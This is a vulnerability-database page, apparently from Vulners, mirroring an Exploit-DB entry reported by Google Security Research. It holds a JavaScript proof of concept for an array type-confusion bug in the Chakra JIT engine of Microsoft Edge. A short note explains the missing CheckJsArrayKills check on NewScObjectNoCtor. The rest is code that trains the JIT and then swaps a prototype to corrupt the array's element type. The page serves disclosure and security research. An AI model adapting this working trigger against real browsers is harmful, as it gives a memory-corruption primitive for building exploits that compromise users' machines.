Lucene search

K

Microsoft Edge Chakra JIT - 'NewScObjectNoCtor' Array Type Confusion

🗓️ 15 Feb 2018 00:00:00Reported by Google Security ResearchType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 26 Views

Microsoft Edge Chakra JIT 'NewScObjectNoCtor' Array Type Confusion vulnerabilit

Show more
Code
/*
This is similar to the previous issues 1457,  1459 (MSRC 42551, MSRC 42552).

If a JavaScript function is used as a consturctor, it sets the new object's "__proto__" to its "prototype". The JIT compiler uses NewScObjectNoCtor instructions to perform it, but those instructions are not checked by CheckJsArrayKills which is used to validate the array information.

PoC:
*/

function inlinee() {

}

function opt(arr) {
    arr[0] = 1.1;
    new inlinee();
    arr[0] = 2.3023e-320;
}

function main() {
    let arr = [1.1];
    for (let i = 0; i < 10000; i++) {
        inlinee.prototype = {};
        opt(arr);
    }

    inlinee.prototype = arr;
    opt(arr);

    print(arr);
}

main();

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
15 Feb 2018 00:00Current
7.4High risk
Vulners AI Score7.4
EPSS0.796
26
.json
Report